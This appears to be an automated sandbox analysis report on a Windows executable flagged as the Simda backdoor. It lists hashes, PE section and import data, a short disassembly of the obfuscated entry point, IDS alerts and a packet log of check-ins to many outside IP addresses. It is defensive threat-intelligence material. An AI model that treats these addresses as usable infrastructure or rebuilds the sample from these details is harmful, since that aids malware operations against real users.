                                                                                                                                                                                                            SSDEEP:6144:x+EqFQ9A9ty5bhJcrs0MurPw/c4hd/B/coyXT3nOGX6T+:x+U9qyFhJy56d/eoyXjn9W+
                                                                                                                                                                                                            MD5:3544C1362497D11F8724B63036038086
                                                                                                                                                                                                            SHA1:267152D77D9B1EBD410CC960B39BB65CBFA3DF98
                                                                                                                                                                                                            SHA-256:1AE862E671FF5E3A807B6F04B7BDBFF9D0EBC3B9C29BF57DA5F44359BB0E6B9E
                                                                                                                                                                                                            SHA-512:92FCAAAE9D6314A1AB6927E4AFA99DBE2A493B53A38CC053A949B4724C42C82C6F58FB1C939AD132C6B04F5E0F2F419B160E8DE0A890CAB908D4BD8B6AF82FA7
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...~.t>.................0.......7................@..........................P.......*y=.....................................a..........H....................@......................................................................................text..../.......0.................. ..`.dHGmL..=s...@.......4..............@..@.lzmjSu..............:..............@....YOSWO...O...........<..............@..@.sTDEgl.Ct...........B..............@..@.fwQO...zy...`.......J..............@..@.L...................X..............@....D.......@...........Z..............@....data....&.......(...`..............@....kubC...ma..........................@....hkw....Y....p......................@....rsrc...H...........................@..@.reloc.......@.......4..............@..B........................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\Desktop\Z8eHwAvqAh.exe
                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):26
                                                                                                                                                                                                            Entropy (8bit):3.95006375643621
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Entropy (8bit):7.8092452156144425
                                                                                                                                                                                                            TrID:
                                                                                                                                                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                            File name:Z8eHwAvqAh.exe
                                                                                                                                                                                                            File size:211'463 bytes
                                                                                                                                                                                                            MD5:3ab620205abe34e0bb0a34c253b30cd7
                                                                                                                                                                                                            SHA1:281bff88b708e81638f6c4548d0bac897a059c54
                                                                                                                                                                                                            SHA256:8b72b2f58a4fe3d7be31e9bc4b53c8b21bc3410243325d2ac15627419fd051ff
                                                                                                                                                                                                            SHA512:f62c252f002843fb43ac035d4155293cf15e25d86a87f5415d506f0c07fe9568135c450a27d2a811116ae6fc52a8a470aaed5497f32d7d3b5b4d1666e8736bba
                                                                                                                                                                                                            SSDEEP:6144:T+EqFQ9A9ty5bhJcrs0MurPw/c4hd/B/coyXT3nOGX6T+:T+U9qyFhJy56d/eoyXjn9W+
                                                                                                                                                                                                            TLSH:212412E7A7548BAAE9571633A94FC31E516853612F84E453EF01AC2D3CF06E13D7B2A0
                                                                                                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...~.t>.................0.......7................@..........................P.......S.<...................................
                                                                                                                                                                                                            Icon Hash:000a5575b595b575
                                                                                                                                                                                                            Entrypoint:0x401000
                                                                                                                                                                                                            Entrypoint Section:.text
                                                                                                                                                                                                            Digitally signed:false
                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                            Subsystem:windows gui
                                                                                                                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                            DLL Characteristics:
                                                                                                                                                                                                            Time Stamp:0x3E74BE7E [Sun Mar 16 18:12:14 2003 UTC]
                                                                                                                                                                                                            TLS Callbacks:
                                                                                                                                                                                                            CLR (.Net) Version:
                                                                                                                                                                                                            OS Version Major:4
                                                                                                                                                                                                            OS Version Minor:0
                                                                                                                                                                                                            File Version Major:4
                                                                                                                                                                                                            File Version Minor:0
                                                                                                                                                                                                            Subsystem Version Major:4
                                                                                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                                                                                            Import Hash:e7f2d5507b09bfb1c824fe29a99d8a60
                                                                                                                                                                                                            Instruction
                                                                                                                                                                                                            mov eax, 00000000h
                                                                                                                                                                                                            mov edx, 0042B50Bh
                                                                                                                                                                                                            mov ecx, edx
                                                                                                                                                                                                            add ecx, 000124B4h
                                                                                                                                                                                                            push ecx
                                                                                                                                                                                                            mov dword ptr [0043D34Bh], 00000000h
                                                                                                                                                                                                            mov ecx, dword ptr [0043D34Bh]
                                                                                                                                                                                                            push ecx
                                                                                                                                                                                                            call dword ptr [004260E0h]
                                                                                                                                                                                                            mov dword ptr [0043DA40h], eax
                                                                                                                                                                                                            xor eax, eax
                                                                                                                                                                                                            mov ebx, 00214203h
                                                                                                                                                                                                            add ebx, 00229C1Fh
                                                                                                                                                                                                            push ebx
                                                                                                                                                                                                            mov dword ptr [0043E0FDh], 00000000h
                                                                                                                                                                                                            mov edx, dword ptr [0043E0FDh]
                                                                                                                                                                                                            push edx
                                                                                                                                                                                                            call dword ptr [004260E0h]
                                                                                                                                                                                                            mov dword ptr [0043D478h], eax
                                                                                                                                                                                                            mov dword ptr [0043E0C9h], 000086A2h
                                                                                                                                                                                                            mov eax, dword ptr [0043E0C9h]
                                                                                                                                                                                                            push 00000E1Eh
                                                                                                                                                                                                            pop edx
                                                                                                                                                                                                            shr edx, 06h
                                                                                                                                                                                                            dec edx
                                                                                                                                                                                                            rol edx, 05h
                                                                                                                                                                                                            sub edx, dword ptr [0043DA4Eh]
                                                                                                                                                                                                            sub edx, eax
                                                                                                                                                                                                            mov ebx, edx
                                                                                                                                                                                                            add ebx, dword ptr [0043E424h]
                                                                                                                                                                                                            inc ebx
                                                                                                                                                                                                            shl ebx, 1
                                                                                                                                                                                                            add dword ptr [0043D75Eh], ebx
                                                                                                                                                                                                            call 00007F79587D3DE2h
                                                                                                                                                                                                            mov dword ptr [0043D653h], eax
                                                                                                                                                                                                            mov edx, 002728E2h
                                                                                                                                                                                                            add edx, 001CA88Dh
                                                                                                                                                                                                            push edx
                                                                                                                                                                                                            mov ecx, 003F5ECEh
                                                                                                                                                                                                            mov ebp, ecx
                                                                                                                                                                                                            mov edi, 00047C6Dh
                                                                                                                                                                                                            add ebp, edi
                                                                                                                                                                                                            push ebp
                                                                                                                                                                                                            push 0014ADBCh
                                                                                                                                                                                                            pop esi
                                                                                                                                                                                                            mov dword ptr [0043D7C8h], 002F2F1Eh
                                                                                                                                                                                                            add esi, dword ptr [0043D7C8h]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x261d4 | 0xb4 | .fwQO
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x69000 | 0x2a048 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x94000 | 0x4aa | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x383dc | 0x1c | .D
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x2fd9 | 0x3000 | d73d0e281626fbb3ecec77d2e8aa1769 | False | 0.7303059895833334 | COM executable for DOS | 6.420148786453065 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.dHGmL | 0x4000 | 0x733d | 0x600 | 146ba48b12ddc4d87c37c42526e6cd84 | False | 0.181640625 | Matlab v4 mat-file (little endian) \333_^\020U, numeric, rows 0, columns 0 | 1.4859327833763099 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.lzmjSu | 0xc000 | 0xc1af | 0x200 | 61af0c0d83c1325686ba8762e3e8d981 | False | 0.40234375 | data | 2.787352355338978 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.YOSWO | 0x19000 | 0x4ff9 | 0x600 | 8f3ef2f627573ad2dcb3e05b99ae413b | False | 0.5924479166666666 | data | 4.742875837921052 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.sTDEgl | 0x1e000 | 0x7443 | 0x800 | 3a8e8bd0335dc84a50fc5c79b67c3d0a | False | 0.60009765625 | data | 5.035390472599325 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.fwQO | 0x26000 | 0x797a | 0xe00 | e879e25bdf58f45d60295218e86bc236 | False | 0.4361049107142857 | data | 4.86580950341829 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.L | 0x2e000 | 0x978e | 0x200 | 010aea57b2cd53e20b70dee59aedc905 | False | 0.640625 | data | 4.558249274598118 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.D | 0x38000 | 0x401a | 0x600 | c2b33e6b4777caf26721728b1213be8b | False | 0.57421875 | data | 4.666855552838835 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.data | 0x3d000 | 0x2691 | 0x2800 | f66ee5f77d63a2d0f55a13b4aab8b246 | False | 0.84580078125 | data | 7.005203294431193 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.kubC | 0x40000 | 0x616d | 0x400 | 0fc3d2bf5e87a10e3ed265156ec1b7b7 | False | 0.2353515625 | Matlab v4 mat-file (little endian) \316, numeric, rows 0, columns 0 | 1.822118650991909 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.hkw | 0x47000 | 0x21b59 | 0x600 | 1427a6ec5060bd3a64df6cc9b4758b57 | False | 0.15494791666666666 | data | 1.2660415037779147 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x69000 | 0x2a048 | 0x2a200 | 5363093beaf747e12444bb8e872dcf11 | False | 0.9833028097181009 | data | 7.981989177826033 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x94000 | 0x4aa | 0x600 | 6af87ce341dd6bf5cc992452b47fea53 | False | 0.7565104166666666 | data | 6.20097753724165 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x69178 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.41627579737335835
RT_DIALOG | 0x6a220 | 0x3a | data | English | United States | 0.9827586206896551
RT_RCDATA | 0x6a25c | 0x28b94 | data | English | United States | 1.0003656986643006
RT_GROUP_ICON | 0x92df0 | 0x14 | data | English | United States | 1.1
RT_VERSION | 0x92e04 | 0x244 | data | English | United States | 0.5431034482758621
DLL | Import
KERNEL32.DLL | DosDateTimeToFileTime, GetSystemDirectoryW, WriteFile, GetProcAddress, CreateFileA, GetModuleHandleA, CreateDirectoryA, FileTimeToSystemTime, IsBadStringPtrA, GetSystemDirectoryA, GetTimeFormatA, lstrcpyn, LocalAlloc, OpenWaitableTimerA, EnumCalendarInfoA, GetNamedPipeInfo, IsValidCodePage
USER32.DLL | EnumChildWindows, GetSysColor, DialogBoxParamA, CreateMenu, EnumDesktopsA, GetClassNameA, CharNextA, ReleaseDC, RegisterWindowMessageA, EnumWindows, InvalidateRgn, SetWindowLongA, ShowCursor, CreateAcceleratorTableW, GetCaretPos, SetFocus, UnregisterClassW, PeekMessageW, SetMenu, GetMenuItemInfoA, LoadImageA, SendMessageW, DialogBoxIndirectParamA, CopyRect, GetWindowRect, GetScrollPos, CopyImage, GetSysColorBrush, PostQuitMessage, CheckDlgButton, GetDC, IsWindowEnabled, FillRect, CharLowerA, CreateDesktopA, UpdateWindow, SetCapture, SendDlgItemMessageW, LoadBitmapW, CreateWindowExW, GetDlgItemTextA, DefDlgProcA, GetKeyboardType, DefWindowProcW, CloseWindow, DestroyIcon, SetActiveWindow, CharUpperW
gdi32.dll | GetPixelFormat, GetMetaRgn, GetEnhMetaFilePaletteEntries, GetWorldTransform, GetTextExtentExPointA, GetPath, GetLogColorSpaceW
advapi32.dll | RegOpenKeyExA, RegCreateKeyExW, RegCloseKey, RegDeleteValueW, RegReplaceKeyA, RegEnumValueA
shell32.dll | StrCmpNIA, StrRStrA, StrStrIA
WINSPOOL.DRV | EnumPrinterDataA, AddPortW, DocumentPropertiesW, GetJobA, ConfigurePortA, AddMonitorA, EnumPrinterKeyA, EndPagePrinter, DocumentPropertySheets
INETCOMM.DLL | MimeOleConvertEnrichedToHTML, MimeOleSMimeCapInit, MimeOleGetBodyPropW, MimeEditViewSource, DllGetClassObject, MimeOleCreateMessageParts, MimeOleCreateBody, HrGetDisplayNameWithSizeForFile, CreateIMAPTransport, HrFreeAttachData, HrGetLastOpenFileDirectoryW, MimeOleGetCodePageCharset, MimeEditDocumentFromStream
CRYPT32.DLL | CryptSignCertificate, CertCreateCRLContext, CryptMsgOpenToDecode, CertIsValidCRLForCertificate, CryptGetOIDFunctionAddress, CertAddEncodedCertificateToStore
Language of compilation system | Country where language is spoken
English | United States
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-11T18:24:29.542828+0100 | 2021022 | ET MALWARE Wapack Labs Sinkhole DNS Reply | 1 | 1.1.1.1 | 53 | 192.168.2.10 | 64434 | UDP
2024-11-11T18:24:29.656338+0100 | 2804852 | ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin | 1 | 192.168.2.10 | 49723 | 18.208.156.248 | 80 | TCP
2024-11-11T18:24:29.661302+0100 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 18.208.156.248 | 80 | 192.168.2.10 | 49723 | TCP
2024-11-11T18:24:29.661302+0100 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1 | 18.208.156.248 | 80 | 192.168.2.10 | 49723 | TCP
2024-11-11T18:24:29.924269+0100 | 2804852 | ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin | 1 | 192.168.2.10 | 49724 | 199.59.243.227 | 80 | TCP
2024-11-11T18:24:29.956188+0100 | 2804852 | ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin | 1 | 192.168.2.10 | 49725 | 3.94.10.34 | 80 | TCP
2024-11-11T18:24:29.964042+0100 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 3.94.10.34 | 80 | 192.168.2.10 | 49725 | TCP
2024-11-11T18:24:29.964042+0100 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1 | 3.94.10.34 | 80 | 192.168.2.10 | 49725 | TCP
2024-11-11T18:24:30.172576+0100 | 2804852 | ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin | 1 | 192.168.2.10 | 49727 | 23.253.46.64 | 80 | TCP
2024-11-11T18:24:30.235862+0100 | 2804852 | ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin | 1 | 192.168.2.10 | 49728 | 99.83.170.3 | 80 | TCP
2024-11-11T18:24:30.252508+0100 | 2804852 | ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin | 1 | 192.168.2.10 | 49726 | 188.114.96.3 | 80 | TCP
2024-11-11T18:24:30.455126+0100 | 2804852 | ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin | 1 | 192.168.2.10 | 49735 | 44.221.84.105 | 80 | TCP
2024-11-11T18:24:30.468239+0100 | 2804852 | ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin | 1 | 192.168.2.10 | 49734 | 208.100.26.245 | 80 | TCP
2024-11-11T18:24:30.492705+0100 | 2804852 | ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin | 1 | 192.168.2.10 | 49736 | 44.221.84.105 | 80 | TCP
2024-11-11T18:24:30.499898+0100 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 44.221.84.105 | 80 | 192.168.2.10 | 49736 | TCP
2024-11-11T18:24:30.499898+0100 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1 | 44.221.84.105 | 80 | 192.168.2.10 | 49736 | TCP
2024-11-11T18:24:30.572465+0100 | 2804852 | ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin | 1 | 192.168.2.10 | 49734 | 208.100.26.245 | 80 | TCP
2024-11-11T18:24:30.884282+0100 | 2804852 | ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin | 1 | 192.168.2.10 | 49738 | 23.253.46.64 | 80 | TCP
2024-11-11T18:24:31.271136+0100 | 2804852 | ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin | 1 | 192.168.2.10 | 49739 | 99.83.170.3 | 443 | TCP
2024-11-11T18:24:31.354863+0100 | 2804852 | ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin | 1 | 192.168.2.10 | 49741 | 154.212.231.82 | 80 | TCP
2024-11-11T18:24:31.619135+0100 | 2804852 | ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin | 1 | 192.168.2.10 | 49737 | 199.191.50.83 | 80 | TCP
2024-11-11T18:24:31.721361+0100 | 2804852 | ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin | 1 | 192.168.2.10 | 49741 | 154.212.231.82 | 80 | TCP
2024-11-11T18:24:31.878427+0100 | 2804852 | ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin | 1 | 192.168.2.10 | 49740 | 188.114.96.3 | 443 | TCP
2024-11-11T18:24:32.263879+0100 | 2804852 | ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin | 1 | 192.168.2.10 | 49726 | 188.114.96.3 | 80 | TCP
2024-11-11T18:24:33.756133+0100 | 2804852 | ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin | 1 | 192.168.2.10 | 49761 | 188.114.96.3 | 443 | TCP
2024-11-11T18:24:40.920775+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 4.245.163.56 | 443 | 192.168.2.10 | 49807 | TCP
2024-11-11T18:25:01.551897+0100 | 2804852 | ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin | 1 | 192.168.2.10 | 49747 | 178.162.203.202 | 80 | TCP
                                                                                                                                                                                                            2024-11-11T18:25:10.006115+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.1049974178.162.203.20280TCP
                                                                                                                                                                                                            2024-11-11T18:25:10.468485+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.104999413.248.169.4880TCP
                                                                                                                                                                                                            2024-11-11T18:25:10.752110+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.106405318.208.156.24880TCP
                                                                                                                                                                                                            2024-11-11T18:25:10.778434+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.10640543.94.10.3480TCP
                                                                                                                                                                                                            2024-11-11T18:25:10.891885+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.1064052188.114.97.380TCP
                                                                                                                                                                                                            2024-11-11T18:25:11.599597+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.1064055103.150.10.4880TCP
                                                                                                                                                                                                            2024-11-11T18:25:12.707263+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.1064055103.150.10.4880TCP
                                                                                                                                                                                                            2024-11-11T18:25:14.399690+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.1064056188.114.97.3443TCP
                                                                                                                                                                                                            2024-11-11T18:25:14.823138+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.1064052188.114.97.380TCP
                                                                                                                                                                                                            2024-11-11T18:25:16.983038+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.1064058188.114.97.3443TCP
                                                                                                                                                                                                            2024-11-11T18:25:17.820751+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.106405976.223.67.18980TCP
                                                                                                                                                                                                            2024-11-11T18:25:17.942769+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.1064060103.224.212.21080TCP
                                                                                                                                                                                                            2024-11-11T18:25:18.030999+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.1064061103.224.182.25280TCP
                                                                                                                                                                                                            2024-11-11T18:25:18.054302+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.106406444.221.84.10580TCP
                                                                                                                                                                                                            2024-11-11T18:25:18.068366+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.106406264.225.91.7380TCP
                                                                                                                                                                                                            2024-11-11T18:25:18.434038+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.1064063154.85.183.5080TCP
                                                                                                                                                                                                            2024-11-11T18:25:18.728763+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.1064063154.85.183.5080TCP
                                                                                                                                                                                                            2024-11-11T18:25:18.978992+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow14.245.163.56443192.168.2.1064065TCP
                                                                                                                                                                                                            2024-11-11T18:25:20.420375+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.106237364.225.91.7380TCP
                                                                                                                                                                                                            2024-11-11T18:25:20.659044+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.106130072.52.179.17480TCP
                                                                                                                                                                                                            2024-11-11T18:25:22.090869+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.106130172.52.179.17480TCP
                                                                                                                                                                                                            2024-11-11T18:25:25.491907+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.105797452.34.198.22980TCP
                                                                                                                                                                                                            2024-11-11T18:25:25.507333+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz152.34.198.22980192.168.2.1057974TCP
                                                                                                                                                                                                            2024-11-11T18:25:25.507333+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst152.34.198.22980192.168.2.1057974TCP
                                                                                                                                                                                                            2024-11-11T18:25:28.402460+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.105748144.221.84.10580TCP
                                                                                                                                                                                                            2024-11-11T18:25:29.986729+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.1062042199.59.243.22780TCP
                                                                                                                                                                                                            2024-11-11T18:25:30.016943+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.106204323.253.46.6480TCP
                                                                                                                                                                                                            2024-11-11T18:25:30.024856+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.1062044208.100.26.24580TCP
                                                                                                                                                                                                            2024-11-11T18:25:30.172771+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.106204799.83.170.380TCP
                                                                                                                                                                                                            2024-11-11T18:25:30.376055+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.1062044208.100.26.24580TCP
                                                                                                                                                                                                            2024-11-11T18:25:30.465143+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.1062045154.212.231.8280TCP
                                                                                                                                                                                                            2024-11-11T18:25:30.544301+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.1062046188.114.96.380TCP
                                                                                                                                                                                                            2024-11-11T18:25:30.773879+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.106204823.253.46.6480TCP
                                                                                                                                                                                                            2024-11-11T18:25:30.840579+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.1062045154.212.231.8280TCP
                                                                                                                                                                                                            2024-11-11T18:25:31.135013+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.106204999.83.170.3443TCP
                                                                                                                                                                                                            2024-11-11T18:25:31.798675+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.1062050188.114.96.3443TCP
                                                                                                                                                                                                            2024-11-11T18:25:32.206033+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.1062046188.114.96.380TCP
                                                                                                                                                                                                            2024-11-11T18:25:33.653749+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.1062051188.114.96.3443TCP
                                                                                                                                                                                                            2024-11-11T18:25:37.542456+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.1062041178.162.203.20280TCP
                                                                                                                                                                                                            2024-11-11T18:25:49.893635+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.1062052178.162.203.20280TCP
                                                                                                                                                                                                            2024-11-11T18:25:54.210999+01002021022ET MALWARE Wapack Labs Sinkhole DNS Reply11.1.1.153192.168.2.1054457UDP
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.172575951 CET804972723.253.46.64192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.172575951 CET4972780192.168.2.1023.253.46.64
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.172614098 CET4972780192.168.2.1023.253.46.64
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.173686028 CET4972780192.168.2.1023.253.46.64
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.173712015 CET4972780192.168.2.1023.253.46.64
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.192476034 CET4973880192.168.2.1023.253.46.64
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.197556973 CET804973823.253.46.64192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.197750092 CET4973880192.168.2.1023.253.46.64
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.198434114 CET4973880192.168.2.1023.253.46.64
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.203239918 CET804973823.253.46.64192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.235766888 CET804972899.83.170.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.235862017 CET4972880192.168.2.1099.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.241128922 CET4972880192.168.2.1099.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.241633892 CET804972899.83.170.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.241694927 CET4972880192.168.2.1099.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.246541977 CET804972899.83.170.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.252443075 CET8049726188.114.96.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.252507925 CET4972680192.168.2.10188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.253093958 CET49739443192.168.2.1099.83.170.3
